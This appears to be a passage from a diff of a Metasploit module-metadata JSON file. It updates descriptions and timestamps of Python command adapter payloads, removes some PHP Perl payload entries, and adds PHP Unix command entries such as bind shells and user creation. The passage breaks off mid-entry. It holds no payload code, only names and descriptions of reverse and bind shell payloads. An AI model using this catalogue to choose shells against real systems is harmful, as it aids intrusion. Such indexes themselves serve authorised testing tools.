+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nExecute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196520,7 +196650,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/exec",
@@ -196545,7 +196675,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196553,7 +196683,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter/bind_tcp",
@@ -196581,7 +196711,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196589,7 +196719,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter/bind_tcp_uuid",
@@ -196616,7 +196746,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196624,7 +196754,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter/reverse_http",
@@ -196651,7 +196781,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196659,7 +196789,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter/reverse_https",
@@ -196686,7 +196816,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196694,7 +196824,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter/reverse_tcp",
@@ -196723,7 +196853,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "RageLtMan"
    ],
-    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196731,7 +196861,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_ssl",
@@ -196759,7 +196889,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196767,7 +196897,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_uuid",
@@ -196794,7 +196924,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nConnect to the victim and spawn a Meterpreter shell",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196802,7 +196932,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter_bind_tcp",
@@ -196827,7 +196957,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196835,7 +196965,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter_reverse_http",
@@ -196860,7 +196990,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196868,7 +196998,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter_reverse_https",
@@ -196893,7 +197023,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196901,7 +197031,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/meterpreter_reverse_tcp",
@@ -196927,7 +197057,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nListens for a connection from the attacker, sends a UUID, then terminates",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196935,7 +197065,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/pingback_bind_tcp",
@@ -196961,7 +197091,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nConnects back to the attacker, sends a UUID, then terminates",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -196969,7 +197099,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/pingback_reverse_tcp",
@@ -196995,7 +197125,7 @@
      "Spencer McIntyre",
      "mumbai"
    ],
-    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -197003,7 +197133,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/shell_bind_tcp",
@@ -197029,7 +197159,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -197037,7 +197167,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/shell_reverse_sctp",
@@ -197063,7 +197193,7 @@
      "Spencer McIntyre",
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
-    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -197071,7 +197201,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/shell_reverse_tcp",
@@ -197097,7 +197227,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -197105,7 +197235,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/shell_reverse_tcp_ssl",
@@ -197131,7 +197261,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload as an OS command from a Posix-compatible shell.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [],
    "platform": "Unix",
    "arch": "cmd",
@@ -197139,7 +197269,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-05-22 11:47:50 +0000",
    "path": "/modules/payloads/adapters/cmd/unix/python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/python/shell_reverse_udp",
@@ -228740,70 +228870,6 @@
    "payload_type": 1,
    "staged": false
  },
-  "payload_php/bind_perl": {
-    "name": "PHP Command Shell, Bind TCP (via Perl)",
-    "fullname": "payload/php/bind_perl",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "payload",
-    "author": [
-      "Samy <samy@samy.pl>",
-      "cazz <bmc@shmoo.com>"
-    ],
-    "description": "Listen for a connection and spawn a command shell via perl (persistent)",
-    "references": [],
-    "platform": "PHP",
-    "arch": "php",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
-    "path": "/modules/payloads/singles/php/bind_perl.rb",
-    "is_install_path": true,
-    "ref_name": "php/bind_perl",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {},
-    "session_types": false,
-    "needs_cleanup": false,
-    "payload_type": 1,
-    "staged": false
-  },
-  "payload_php/bind_perl_ipv6": {
-    "name": "PHP Command Shell, Bind TCP (via perl) IPv6",
-    "fullname": "payload/php/bind_perl_ipv6",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "payload",
-    "author": [
-      "Samy <samy@samy.pl>",
-      "cazz <bmc@shmoo.com>"
-    ],
-    "description": "Listen for a connection and spawn a command shell via perl (persistent) over IPv6",
-    "references": [],
-    "platform": "PHP",
-    "arch": "php",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
-    "path": "/modules/payloads/singles/php/bind_perl_ipv6.rb",
-    "is_install_path": true,
-    "ref_name": "php/bind_perl_ipv6",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {},
-    "session_types": false,
-    "needs_cleanup": false,
-    "payload_type": 1,
-    "staged": false
-  },
  "payload_php/bind_php": {
    "name": "PHP Command Shell, Bind TCP (via PHP)",
    "fullname": "payload/php/bind_php",
@@ -228917,7 +228983,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-05-09 16:09:15 +0000",
    "path": "/modules/payloads/singles/php/exec.rb",
    "is_install_path": true,
    "ref_name": "php/exec",
@@ -229162,37 +229228,6 @@
    "payload_type": 1,
    "staged": false
  },
-  "payload_php/reverse_perl": {
-    "name": "PHP Command, Double Reverse TCP Connection (via Perl)",
-    "fullname": "payload/php/reverse_perl",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "payload",
-    "author": [
-      "cazz <bmc@shmoo.com>"
-    ],
-    "description": "Creates an interactive shell via perl",
-    "references": [],
-    "platform": "PHP",
-    "arch": "php",
-    "rport": null,
-    "autofilter_ports": null,
-    "autofilter_services": null,
-    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
-    "path": "/modules/payloads/singles/php/reverse_perl.rb",
-    "is_install_path": true,
-    "ref_name": "php/reverse_perl",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {},
-    "session_types": false,
-    "needs_cleanup": false,
-    "payload_type": 1,
-    "staged": false
-  },
  "payload_php/reverse_php": {
    "name": "PHP Command Shell, Reverse TCP (via PHP)",
    "fullname": "payload/php/reverse_php",
@@ -229242,7 +229277,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-05-09 14:44:21 +0000",
    "path": "/modules/payloads/singles/php/shell_findsock.rb",
    "is_install_path": true,
    "ref_name": "php/shell_findsock",
@@ -229255,6 +229290,1798 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_php/unix/cmd/adduser": {
+    "name": "OS Command Exec, Add user with useradd",
+    "fullname": "payload/php/unix/cmd/adduser",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Nick Cottrell <Rad10Logic>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates a new user. By default the new user is set with sudo\nbut other options exist to make the new user automatically\nroot but this is not automatically set since the new user will\nbe treated as root (and login may be difficult). The new user\ncan also be set as just a standard user if desired.",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/adduser",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/adduser",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_awk": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via AWK)",
+    "fullname": "payload/php/unix/cmd/bind_awk",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "espreto <robertoespreto@gmail.com>",
+      "Ulisses Castro <uss.thebug@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via GNU AWK",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_awk",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_awk",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_busybox_telnetd": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via BusyBox telnetd)",
+    "fullname": "payload/php/unix/cmd/bind_busybox_telnetd",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Matthew Kienow <matthew_kienow[AT]rapid7.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via BusyBox telnetd",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_busybox_telnetd",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_busybox_telnetd",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_inetd": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (inetd)",
+    "fullname": "payload/php/unix/cmd/bind_inetd",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell (persistent)",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_inetd",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_inetd",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_jjs": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via jjs)",
+    "fullname": "payload/php/unix/cmd/bind_jjs",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "conerpirate",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via jjs",
+    "references": [
+      "URL-https://gtfobins.github.io/gtfobins/jjs/",
+      "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/",
+      "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_jjs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_jjs",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_lua": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via Lua)",
+    "fullname": "payload/php/unix/cmd/bind_lua",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "xistence <xistence@0x90.nl>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via Lua",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_lua",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_lua",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_netcat": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via netcat)",
+    "fullname": "payload/php/unix/cmd/bind_netcat",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "m-1-k-3",
+      "egypt <egypt@metasploit.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via netcat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_netcat",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_netcat",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_netcat_gaping": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via netcat -e)",
+    "fullname": "payload/php/unix/cmd/bind_netcat_gaping",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via netcat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_netcat_gaping",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_netcat_gaping",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_netcat_gaping_ipv6": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via netcat -e) IPv6",
+    "fullname": "payload/php/unix/cmd/bind_netcat_gaping_ipv6",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via netcat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_netcat_gaping_ipv6",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_netcat_gaping_ipv6",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_nodejs": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via nodejs)",
+    "fullname": "payload/php/unix/cmd/bind_nodejs",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "joev <joev@metasploit.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nContinually listen for a connection and spawn a command shell via nodejs",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_nodejs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_nodejs",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_perl": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via Perl)",
+    "fullname": "payload/php/unix/cmd/bind_perl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Samy <samy@samy.pl>",
+      "cazz <bmc@shmoo.com>"
